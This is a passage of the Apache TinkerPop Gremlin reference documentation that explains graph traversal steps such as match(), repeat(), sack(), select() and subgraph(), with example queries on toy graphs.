graph), it is advantageous to use `match()`, as an optimal plan will be determined automatically. Furthermore, some queries are much easier to express via `match()` than with single-path traversals.\n\n\t\"Who created a project named 'lop' that was also created by someone who is 29 years old? Return the two creators.\"\n\nimage::match-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').as('b'),\n __.as('b').has('name', 'lop'),\n __.as('b').in('created').as('c'),\n __.as('c').has('age', 29)).select('a','c').by('name')\n----\n\nNote that the above can also be more concisely written as below which demonstrates that imperative inner-traversals can be arbitrarily defined.\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').has('name', 'lop').as('b'),\n __.as('b').in('created').has('age', 29).as('c')).select('a','c').by('name')\n----\n\n[[grateful-dead]]\n.Grateful Dead\nimage::grateful-dead-schema.png[width=475]\n\nMatchStep brings functionality similar to link:http:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin. Like SPARQL, MatchStep conjoins a set of patterns applied to a graph. For example, the following traversal finds exactly those songs which Jerry Garcia has both sung and written (using the Grateful Dead graph distributed in the `data\/` directory): \n\n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().match('a',\n __.as('a').has('name', 'Garcia'),\n __.as('a').in('writtenBy').as('b'),\n __.as('a').in('sungBy').as('b')).select('b').values('name')\n----\n\nAmong the features which differentiate `match()` from SPARQL are:\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').has('name','lop').as('b'), <1>\n __.as('b').in('created').has('age', 29).as('c'),\n __.as('c').repeat(out()).times(2)). <2>\n select('c').out('knows').dedup().values('name') <3>\n----\n\n<1> *Patterns of arbitrary complexity*: `match()` is not restricted to triple patterns or property paths.\n<2> *Recursion support*: `match()` supports the branch-based steps within a pattern, including `repeat()`.\n<3> *Imperative\/declarative hybrid*: Pre and prior to a `match()`, it is possible to leverage classic Gremlin imperative.\n\nTo extend point #3, it is possible to support going from imperative, to declarative, to imperative, ad infinitum.\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop')).\n select('b').out('created').\n match('a',\n __.as('a').in('created').as('b'),\n __.as('b').out('knows').as('c')).\n select('c').values('name')\n----\n\nLike all other steps in Gremlin, `match()` is a function and thus, `match()` within `match()` is a natural consequence of Gremlin's functional foundation (i.e. recursive matching).\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop'),\n __.as('b').match('x',\n __.as('x').out('created').as('y'),\n __.as('y').has('name','ripple')).\n select('y').as('c')).\n select('a','c').by('name')\n----\n\nWARNING: Currently, `match()` does not operate within a multi-JVM <<graphcomputer,GraphComputer>> OLAP environment. Future work includes a linearization <<traversalstrategy,TraversalStrategy>> for `match()`.\n\n[[using-where-with-match]]\nUsing Where with Match\n^^^^^^^^^^^^^^^^^^^^^^\n\nMatch is typically used in conjunction with both `select()` (demonstrated previously) and `where()` (presented here). A `where()` allows the user to further constrain the result set provided by `match()`.\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where('a', neq('c')).select('a','c').by('name')\n----\n\nThe `where()`-step can take either a `BiPredicate` (first example below) or a `Traversal` (second example below). Using `MatchWhereStrategy`, `where()`-clauses can be automatically folded into `match()` and thus, subject to `match()`-steps budget-match algorithm.\n\n[gremlin-groovy,modern]\n----\ntraversal = g.V().match('a',\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where(__.as('a').out('knows').as('c')). <1>\n select('a','c').by('name'); null <2>\ntraversal.toString() <3>\ntraversal <4> <5>\ntraversal.toString() <6>\n----\n\n<1> A `where()`-step with a traversal containing variable bindings declared in `match()`.\n<2> A useful trick to ensure that that the traversal is not iterated by Gremlin Console.\n<3> The string representation of the traversal prior to its strategies being applied.\n<4> The Gremlin Console will automatically iterate anything that is an iterator or is iterable.\n<5> Both marko and josh are co-developers and marko knows josh.\n<6> The string representation of the traversal after the strategies have been applied (and thus, `where()` is folded into `match()`)\n\n[[max-step]]\nMax Step\n~~~~~~~~\n\nThe `max()`-step (*map*) operates on a stream of numbers and determines which is the largest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').max()\ng.V().repeat(both()).times(3).values('age').max()\n----\n\nIMPORTANT: `max(local)` determines the max of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a max of `Double.NaN` is returned.\n\n[[mean-step]]\nMean Step\n~~~~~~~~~\n\nThe `mean()`-step (*map*) operates on a stream of numbers and determines the average of those numbers.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').mean()\ng.V().repeat(both()).times(3).values('age').mean() <1>\ng.V().repeat(both()).times(3).values('age').dedup().mean()\n----\n\n<1> Realize that traversers are being bulked by `repeat()`. There may be more of a particular number than another, thus altering the average.\n\nIMPORTANT: `mean(local)` determines the mean of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a mean of `Double.NaN` is returned.\n\n[[min-step]]\nMin Step\n~~~~~~~~\n\nThe `min()`-step (*map*) operates on a stream of numbers and determines which is the smallest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').min()\ng.V().repeat(both()).times(3).values('age').min()\n----\n\nIMPORTANT: `min(local)` determines the min of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a min of `Double.NaN` is returned.\n\n[[or-step]]\nOr Step\n~~~~~~~\n\nThe `or()`-step ensures that at least one of the provided traversals yield a result (*filter*). Please see <<and-step,`and()`>> for and-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().or(\n __.outE('created'),\n __.inE('created').count().is(gt(1l))).\n values('name')\n----\n\nThe `or()`-step can take an arbitrary number of traversals. At least one of the traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be or'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().has(outE('created').or().outE('knows')).values('name')\n----\n\n[[order-step]]\nOrder Step\n~~~~~~~~~~\n\nWhen the objects of the traversal stream need to be sorted, `order()`-step (*map*) can be leveraged.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name').order()\ng.V().values('name').order().by(decr)\ng.V().hasLabel('person').order().by('age', incr).values('name')\n----\n\nOne of the most traversed objects in a traversal is an `Element`. An element can have properties associated with it (i.e. key\/value pairs). In many situations, it is desirable to sort an element traversal stream according to a comparison of their properties.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name')\ng.V().order().by('name',incr).values('name')\ng.V().order().by('name',decr).values('name')\n----\n\nThe `order()`-step allows the user to provide an arbitrary number of comparators for primary, secondary, etc. sorting. In the example below, the primary ordering is based on the outgoing created-edge count. The secondary ordering is based on the age of the person.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', incr).values('name')\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', decr).values('name')\n----\n\nRandomizing the order of the traversers at a particular point in the traversal is possible with `Order.shuffle`.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(shuffle)\ng.V().hasLabel('person').order().by(shuffle)\n----\n\nIMPORTANT: `order(local)` orders the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, the object is returned unchanged.\n\n[[path-step]]\nPath Step\n~~~~~~~~~\n\nA traverser is transformed as it moves through a series of steps within a traversal. The history of the traverser is realized by examining its path with `path()`-step (*map*).\n\nimage::path-step.png[width=650]\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().values('name')\ng.V().out().out().values('name').path()\n----\n\nIf edges are required in the path, then be sure to traverser those edges explicitly.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().inV().outE().inV().path()\n----\n\nIt is possible to post-process the elements of the path in a round-robin fashion via `by()`.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by('name').by('age')\n----\n\nFinally, because `by()`-based post-processing, nothing prevents triggering yet another traversal. In the traversal below, for each element of the path traversed thus far, if its a person (as determined by having an `age`-property), then get all of their creations, else if its a creation, get all the people that created it.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by(\n choose(hasLabel('person'),\n out('created').values('name'),\n __.in('created').values('name')).fold())\n----\n\nWARNING: Generating path information is expensive as the history of the traverser is stored into a Java list. With numerous traversers, there are numerous lists. Moreover, in an OLAP <<graphcomputer,`GraphComputer`>> environment this becomes exceedingly prohibitive as there are traversers emanating from all vertices in the graph in parallel. In OLAP there are optimizations provided for traverser populations, but when paths are calculated (and each traverser is unique due to its history), then these optimizations are no longer possible.\n\n[[path-data-structure]]\nPath Data Structure\n^^^^^^^^^^^^^^^^^^^\n\nThe `Path` data structure is an ordered list of objects, where each object is associated to a `Set<String>` of labels. An example is presented below to demonstrate both the `Path` API as well as how a traversal yields labeled paths.\n\nimage::path-data-structure.png[width=350]\n\n[gremlin-groovy,modern]\n----\npath = g.V(1).as('a').has('name').as('b').\n out('knows').out('created').as('c').\n has('name','ripple').values('name').as('d').\n identity().as('e').path().next()\npath.size()\npath.objects()\npath.labels()\npath.a\npath.b\npath.c\npath.d == path.e\n----\n\n[[profile-step]]\nProfile Step\n~~~~~~~~~~~~\n\nThe `profile()`-step (*sideEffect*) exists to allow developers to profile their traversals to determine statistical information like step runtime, counts, etc.\n\nWARNING: Profiling a Traversal will impede the Traversal's performance. This overhead is mostly excluded from the profile results, but durations are not exact. Thus, durations are best considered in relation to each other.\n\n[gremlin-groovy,modern]\n----\ng.V().out('created').repeat(both()).times(3).hasLabel('person').values('age').sum().profile().cap(TraversalMetrics.METRICS_KEY)\n----\n\nThe `profile()`-step generates a `TraversalMetrics` sideEffect object that contains the following information:\n\n* `Step`: A step within the traversal being profiled.\n* `Count`: The number of _represented_ traversers that passed through the step.\n* `Traversers`: The number of traversers that passed through the step.\n* `Time (ms)`: The total time the step was actively executing its behavior.\n* `% Dur`: The percentage of total time spent in the step.\n\nimage:gremlin-exercise.png[width=120,float=left] It is important to understand the difference between `Count` and `Traversers`. Traversers can be merged and as such, when two traversers are \"the same\" they may be aggregated into a single traverser. That new traverser has a `Traverser.bulk()` that is the sum of the two merged traverser bulks. On the other hand, the `Count` represents the sum of all `Traverser.bulk()` results and thus, expresses the number of \"represented\" (not enumerated) traversers. `Traversers` will always be less than or equal to `Count`.\n\n[[range-step]]\nRange Step\n~~~~~~~~~~\n\nAs traversers propagate through the traversal, it is possible to only allow a certain number of them to pass through with `range()`-step (*filter*). When the low-end of the range is not met, objects are continued to be iterated. When within the low and high range (both inclusive), traversers are emitted. Finally, when above the high range, the traversal breaks out of iteration.\n\n[gremlin-groovy,modern]\n----\ng.V().range(0,3)\ng.V().range(1,3)\ng.V().repeat(both()).times(1000000).emit().range(6,10)\n----\n\n[[repeat-step]]\nRepeat Step\n~~~~~~~~~~~\n\nimage::gremlin-fade.png[width=350]\n\nThe `repeat()`-step (*branch*) is used for looping over a traversal given some break predicate. Below are some examples of `repeat()`-step in action.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).path().by('name') <1>\ng.V().until(has('name','ripple')).\n repeat(out()).path().by('name') <2>\n----\n\n<1> do-while semantics stating to do `out()` 2 times.\n<2> while-do semantics stating to break if the traverser is at a vertex named \"ripple\".\n\nIMPORTANT: There are two modulators for `repeat()`: `until()` and `emit()`. If `until()` comes after `repeat()` it is do\/while looping. If `until()` comes before `repeat()` it is while\/do looping. If `emit()` is placed after `repeat()`, it is evaluated on the traversers leaving the repeat-traversal. If `emit()` is placed before `repeat()`, it is evaluated on the traversers prior to entering the repeat-traversal.\n\nThe `repeat()`-step also supports an \"emit predicate\", where the predicate for an empty argument `emit()` is true (i.e. `emit() == emit{true}`). With `emit()`, the traverser is split in two -- the traverser exits the code block as well as continues back within the code block (assuming `until()` holds true).\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name') <1>\ng.V(1).emit().repeat(out()).times(2).path().by('name') <2>\n----\n\n<1> The `emit()` comes after `repeat()` and thus, emission happens after the `repeat()` traversal is executed. Thus, no one vertex paths exist.\n<2> The `emit()` comes before `repeat()` and thus, emission happens prior to the `repeat()` traversal being executed. Thus, one vertex paths exist.\n\nThe `emit()`-modulator can take an arbitrary predicate.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit(has('lang')).path().by('name')\n----\n\nimage::repeat-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name')\n----\n\nThe first time through the `repeat()`, the vertices lop, vadas, and josh are seen. Given that `loops==0`, the traverser repeats. However, because the emit-predicate is declared true, those vertices are emitted. At step 2 (`loops==1`), the vertices traversed are ripple and lop (Josh's created projects, as lop and vadas have no out edges) and are also emitted. Now `loops==1` so the traverser repeats. As ripple and lop have no out edges there are no vertices to traverse. Given that `loops==2`, the until-predicate fails. Therefore, the traverser has seen the vertices: lop, vadas, josh, ripple, and lop.\n\nFinally, note that both `emit()` and `until()` can take a traversal and in such, situations, the predicate is determined by `traversal.hasNext()`. A few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).until(hasLabel('software')).path().by('name') <1>\ng.V(1).emit(hasLabel('person')).repeat(out()).path().by('name') <2>\ng.V(1).repeat(out()).until(outE().count().is(0L)).path().by('name') <3>\n----\n\n<1> Starting from vertex 1, keep taking outgoing edges until a software vertex is reached.\n<2> Starting from vertex 1, and in an infinite loop, emit the vertex if it is a person and then traverser the outgoing edges.\n<3> Starting from vertex 1, keep taking outgoing edges until a vertex is reached that has no more outgoing edges.\n\nWARNING: The anonymous traversal of `emit()` and `until()` (not `repeat()`) process their current objects \"locally.\" In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversals do not leave the confines of the vertex's star graph. In other words, they can not traverse to an adjacent vertex's properties or edges.\n\n[[sack-step]]\nSack Step\n~~~~~~~~~\n\nimage:gremlin-sacks-running.png[width=175,float=right] A traverser can contain a local data structure called a \"sack\". The `sack()`-step is used to read and write sacks (*sideEffect* or *map*). Each sack of each traverser is created when using `GraphTraversal.withSack(initialValueSupplier,splitOperator?)`.\n\n* *Initial value supplier*: A `Supplier` providing the initial value of each traverser's sack.\n* *Split operator*: a `UnaryOperator` that clones the traverser's sack when the traverser splits. If no split operator is provided, then `UnaryOperator.identity()` is assumed.\n\nTwo trivial examples are presented below to demonstrate the *initial value supplier*. In the first example below, a traverser is created at each vertex in the graph (`g.V()`), with a 1.0 sack (`withSack(1.0f)`), and then the sack value is accessed (`sack()`). In the second example, a random float supplier is used to generate sack values.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().sack()\nrand = new Random()\ng.withSack {rand.nextFloat()}.V().sack()\n----\n\nA more complicated initial value supplier example is presented below where the sack values are used in a running computation and then emitted at the end of the traversal. When an edge is traversed, the edge weight is multiplied by the sack value (`sack(mult,'weight')`).\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2)\ng.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2).sack()\ng.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2).path().\n by().by('weight')\n----\n\nimage:gremlin-sacks-standing.png[width=100,float=left] When complex objects are used (i.e. non-primitives), then a *split operator* should be defined to ensure that each traverser gets a clone of its parent's sack. The first example does not use a split operator and as such, the same map is propagated to all traversers (a global data structure). The second example, demonstrates how `Map.clone()` ensures that each traverser's sack contains a unique, local sack.\n\n[gremlin-groovy,modern]\n----\ng.withSack {[:]}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ BAD: single map\ng.withSack {[:]}{it.clone()}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ GOOD: cloned map\n----\n\nNOTE: For primitives (i.e. integers, longs, floats, etc.), a split operator is not required as a primitives are encoded in the memory address of the sack, not as a reference to an object.\n\n[[sample-step]]\nSample Step\n~~~~~~~~~~~\n\nThe `sample()`-step is useful for sampling some number of traversers previous in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().sample(1).values('weight')\ng.V().outE().sample(1).by('weight').values('weight')\ng.V().outE().sample(2).by('weight').values('weight')\n----\n\nOne of the more interesting use cases for `sample()` is when it is used in conjunction with <<local-step,`local()`>>. The combination of the two steps supports the execution of link:http:\/\/en.wikipedia.org\/wiki\/Random_walk[random walks]. In the example below, the traversal starts are vertex 1 and selects one edge to traverse based on a probability distribution generated by the weights of the edges. The output is always a single path as by selecting a single edge, the traverser never splits and continues down a single path in the graph.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5)\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5).path()\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(10).path()\n----\n\n[[select-step]]\nSelect Step\n~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Functional_programming[Functional languages] make use of function composition and lazy evaluation to create complex computations from primitive operations. This is exactly what `Traversal` does. One of the differentiating aspects of Gremlin's data flow approach to graph processing is that the flow need not always go \"forward,\" but in fact, can go back to a previously seen area of computation. Examples include <<path-step,`path()`>> as well as the `select()`-step (*map*). There are two general ways to use `select()`-step.\n\n. Select labeled steps within a path (as defined by `as()` in a traversal).\n. Select objects out of a `Map<String,Object>` flow (i.e. a sub-map).\n\nThe first use case is demonstrated via example below.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').out().as('c') \/\/ no select\ng.V().as('a').out().as('b').out().as('c').select()\ng.V().as('a').out().as('b').out().as('c').select('a','b')\ng.V().as('a').out().as('b').out().as('c').select('a','b').by('name')\ng.V().as('a').out().as('b').out().as('c').select('a') <1>\n----\n\n<1> If the selection is one step, no map is returned.\n\nWhen there is only one label selected, then a single object is returned. This is useful for stepping back in a computation and easily moving forward again on the object reverted to.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out()\ng.V().out().out().path()\ng.V().as('x').out().out().select('x')\ng.V().out().as('x').out().select('x')\ng.V().out().out().as('x').select('x') \/\/ pointless\n----\n\nThe second use case is best understood in terms of <<match-step,`match()`>>-step where the result of `match()` is a `Map<String,Object>` of variable bindings. However, any step that emits a `Map<String,Object>` can be selected. A contrived example is presented below.\n\n[gremlin-groovy,modern]\n----\ng.V().range(0, 2).as('a').map {[b:1,c:2]} <1>\ng.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local) <2>\ng.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local,'a','c') <3>\ng.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local,'c') <4>\n----\n\n<1> A contrived example to create a `Map<String,Object>` flow as a foundation for the examples to follow.\n<2> Select will grab both labeled steps and `Map<String,Object>` entries.\n<3> The same `List<String>` selectivity can be used as demonstrated in the previous example.\n<4> If a single selection is used, then the object is emitted not wrapped in a map. Useful for continuing the traversal process without having to do a map projection.\n\nNOTE: When executing a traversal with `select()` on a standard traversal engine (i.e. OLTP), `select()` will do its best to avoid calculating the path history and instead, will rely on a global data structure for storing the currently selected object. As such, if only a subset of the path walked is required, `select()` should be used over the more resource intensive <<path-step,`path()`>>-step.\n\n[[using-where-with-select]]\nUsing Where with Select\n^^^^^^^^^^^^^^^^^^^^^^^\n\nFinally, like <<match-step,`match()`>>-step, it is possible to use `where()`, as where is a filter that processes `Map<String,Object>` streams.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').in('created').as('b').select().by('name') <1>\ng.V().as('a').out('created').in('created').as('b').\n select().by('name').where('a',neq('b')) <2>\ng.V().as('a').out('created').in('created').as('b').\n select(). <3>\n where('a',neq('b')).\n where(__.as('a').out('knows').as('b')).\n select().by('name')\n----\n\n<1> A standard `select()` that generates a `Map<String,Object>` of variables bindings in the path (i.e. `a` and `b`) for the sake of a running example.\n<2> The `select().by('name')` projects each binding vertex to their name property value and `where()` operates to ensure respective `a` and `b` strings are not the same.\n<3> The first `select()` projects a vertex binding set. A binding is filtered if `a` vertex equals `b` vertex. A binding is filtered if `a` doesn't know `b`. The second and final `select()` projects the name of the vertices.\n\n[[simplepath-step]]\nSimplePath Step\n~~~~~~~~~~~~~~~\n\nimage::simplepath-step.png[width=400]\n\nWhen it is important that a traverser not repeat its path through the graph, `simplePath()`-step should be used (*filter*). The <<path-data-structure,path>> information of the traverser is analyzed and if the path has repeated objects in it, the traverser is filtered. If cyclic behavior is desired, see <<cyclicpath-step,`cyclicPath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().simplePath()\ng.V(1).both().both().simplePath().path()\n----\n\n[[store-step]]\nStore Step\n~~~~~~~~~~\n\nWhen link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy] aggregation is needed, `store()`-step (*sideEffect*) should be used over <<aggregate-step,`aggregate()`>>. The two steps differ in that `store()` does not block and only stores objects in its side-effect collection as they pass through.\n\n[gremlin-groovy,modern]\n----\ng.V().aggregate('x').limit(1).cap('x')\ng.V().store('x').limit(1).cap('x')\n----\n\nIt is interesting to note that there are three results in the `store()` side-effect even though the interval selection is for 2 objects. Realize that when the third object is on its way to the `range()` filter (i.e. `[0..1]`), it passes through `store()` and thus, stored before filtered.\n\n[gremlin-groovy,modern]\n----\ng.E().store().by('weight')\n----\n\n[[subgraph-step]]\nSubgraph Step\n~~~~~~~~~~~~~\n\nimage::subgraph-logo.png[width=380]\n\nExtracting a portion of a graph from a larger one for analysis, visualization or other purposes is a fairly common use case for graph analysts and developers. The `subgraph()`-step (*sideEffect*) provides a way to produce an link:http:\/\/mathworld.wolfram.com\/Edge-InducedSubgraph.html[edge-induced subgraph] from virtually any traversal. The following example demonstrates how to produce the \"knows\" subgraph:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.E().hasLabel('knows').subgraph('subGraph').cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E() <2>\n----\n\n<1> As this function produces \"edge-induced\" subgraphs, `subgraph()` must be called at edge steps.\n<2> The subgraph contains only \"knows\" edges.\n\nA more common subgraphing use case is to get all of the graph structure surrounding a single vertex:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.V(3).repeat(__.inE().subgraph('subGraph').outV()).times(3).cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E()\n----\n\n<1> Starting at vertex `3`, traverse 3 steps away on in-edges, outputting all of that into the subgraph.\n\nThere can be multiple `subgraph()` calls within the same traversal. Each operating against either the same graph (i.e. same side-effect key) or different graphs (i.e. different side-effect keys).\n\n[gremlin-groovy,modern]\n----\nt = g.V().outE('knows').subgraph('knowsG').inV().outE('created').subgraph('createdG').\n inV().inE('created').subgraph('createdG').iterate()\nt.sideEffects.get('knowsG').get().traversal(standard()).E()\nt.sideEffects.get('createdG').get().traversal(standard()).E()\n----\n\nIMPORTANT: The `subgraph()`-step only writes to graphs that support user supplied ids for its elements. Moreover, if no graph is specified via `withSideEffect()`, then <<tinkergraph-gremlin,TinkerGraph>> is assumed.\n\n[[sum-step]]\nSum Step\n~~~~~~~~\n\nThe `sum()`-step (*map*) operates on a stream of numbers and sums the numbers together to yield a double. Note that the current traverser number is multiplied by the traverser bulk to determine how many such numbers are being represented.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').sum()\ng.V().repeat(both()).times(3).values('age').sum()\n----\n\nIMPORTANT: `sum(local)` determines the sum of the current, local object (not the objects in the traversal stream). This works for `Collection`-type objects. For any other object, a sum of `Double.NaN` is returned.\n\n[[timelimit-step]]\nTimeLimit Step\n~~~~~~~~~~~~~~\n\nIn many situations, a graph traversal is not about getting an exact answer as its about getting a relative ranking. A classic example is link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation]. What is desired is a relative ranking of vertices, not their absolute rank. Next, it may be desirable to have the traversal execute for no more than 2 milliseconds. In such situations, `timeLimit()`-step (*filter*) can be used.\n\nimage::timelimit-step.png[width=400]\n\nNOTE: The method `clock(int runs, Closure code)` is a utility preloaded in the <<gremlin-console,Gremlin Console>> that can be used to time execution of a body of code.\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\ng.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\n----\n\nIn essence, the relative order is respected, even through the number of traversers at each vertex is not. The primary benefit being that the calculation is guaranteed to complete at the specified time limit (in milliseconds). Finally, note that the internal clock of `timeLimit()`-step starts when the first traverser enters it. When the time limit is reached, any `next()` evaluation of the step will yield a `NoSuchElementException` and any `hasNext()` evaluation will yield `false`.\n\n[[tree-step]]\nTree Step\n~~~~~~~~~\n\nFrom any one element (i.e. vertex or edge), the emanating paths from that element can be aggregated to form a link:http:\/\/en.wikipedia.org\/wiki\/Tree_(data_structure)[tree]. Gremlin provides `tree()`-step (*sideEffect*) for such this situation.\n\nimage::tree-step.png[width=450]\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().next()\n----\n\nIt is important to see how the paths of all the emanating traversers are united to form the tree.\n\nimage::tree-step2.png[width=500]\n\nThe resultant tree data structure can then be manipulated (see link:http:\/\/www.tinkerpop.com\/javadocs\/current\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/step\/util\/Tree.html[Tree JavaDoc]). For the sake of demonstration, a post-processing lambda is applied in the running example below.\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().by('name').next()\ntree['marko']\ntree['marko']['josh']\ntree.getObjectsAtDepth(3)\n----\n\n[[unfold-step]]\nUnfold Step\n~~~~~~~~~~~\n\nIf the object reaching `unfold()` (*flatMap*) is an iterator, iterable, or map, then it is unrolled into a linear form. If not, then the object is simply emitted. Please see <<fold-step,`fold()`>>-step for the inverse behavior.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out().fold().inject('gremlin',[1.23,2.34])\ng.V(1).out().fold().inject('gremlin',[1.23,2.34]).unfold()\n----\n\nNote that `unfold()` does not recursively unroll iterators. Instead, `repeat()` can be used to for recursive unrolling.\n\n[gremlin-groovy,modern]\n----\ninject(1,[2,3,[4,5,[6]]])\ninject(1,[2,3,[4,5,[6]]]).unfold()\ninject(1,[2,3,[4,5,[6]]]).repeat(unfold()).until(unfold().count().is(1l)).unfold()\n----\n\n[[union-step]]\nUnion Step\n~~~~~~~~~~\n\nimage::union-step.png[width=650]\n\nThe `union()`-step (*branch*) supports the merging of the results of an arbitrary number of traversals. When a traverser reaches a `union()`-step, it is copied to each of its internal steps. The traversers emitted from `union()` are the outputs of the respective internal traversals.\n\n[gremlin-groovy,modern]\n----\ng.V(4).union(\n __.in().values('age'),\n out().values('lang'))\ng.V(4).union(\n __.in().values('age'),\n out().values('lang')).path()\n----\n\n[[valuemap-step]]\nValueMap Step\n~~~~~~~~~~~~~\n\nThe `valueMap()`-step yields a Map representation of the properties of an element.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap()\ng.V().valueMap('age')\ng.V().valueMap('age','blah')\ng.E().valueMap()\n----\n\nIt is important to note that the map of a vertex maintains a list of values for each key. The map of an edge or vertex-property represents a single property (not a list). The reason is that vertices in TinkerPop3 leverage <<vertex-properties,vertex properties>> which are support multiple values per key. Using the <<the-crew-toy-graph,\"The Crew\">> toy graph, the point is made explicit.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap()\ng.V().has('name','marko').properties('location')\ng.V().has('name','marko').properties('location').valueMap()\n----\n\nIf the `id`, `label`, `key`, and `value` of the `Element` is desired, then a boolean triggers its insertion into the returned map.\n\n[gremlin-groovy,theCrew]\n----\ng.V().hasLabel('person').valueMap(true)\ng.V().hasLabel('person').valueMap(true,'name')\ng.V().hasLabel('person').properties('location').valueMap(true)\n----\n\n[[vertex-steps]]\nVertex Steps\n~~~~~~~~~~~~\n\nimage::vertex-steps.png[width=350]\n\nThe vertex steps (*flatMap*) are fundamental to the Gremlin language. Via these steps, its possible to \"move\" on the graph -- i.e. traverse.\n\n* `out(string...)`: Move to the outgoing adjacent vertices given the edge labels.\n* `in(string...)`: Move to the incoming adjacent vertices given the edge labels.\n* `both(string...)`: Move to both the incoming and outgoing adjacent vertices given the edge labels.\n* `outE(string...)`: Move to the outgoing incident edges given the edge labels.\n* `inE(string...)`: Move to the incoming incident edges given the edge labels.\n* `bothE(string...)`: Move to both the incoming and outgoing incident edges given the edge labels.\n* `outV()`: Move to the outgoing vertex.\n* `inV()`: Move to the incoming vertex.\n* `bothV()`: Move to both vertices.\n* `otherV()` : Move to the vertex that was not the vertex that was moved from.\n\n[gremlin-groovy,modern]\n----\ng.V(4)\ng.V(4).outE() <1>\ng.V(4).inE('knows') <2>\ng.V(4).inE('created') <3>\ng.V(4).bothE('knows','created','blah')\ng.V(4).bothE('knows','created','blah').otherV()\ng.V(4).both('knows','created','blah')\ng.V(4).outE().inV() <4>\ng.V(4).out() <5>\ng.V(4).inE().outV()\ng.V(4).inE().bothV()\n----\n\n<1> All outgoing edges.\n<2> All incoming knows-edges.\n<3> All incoming created-edges.\n<4> Moving forward touching edges and vertices.\n<5> Moving forward only touching 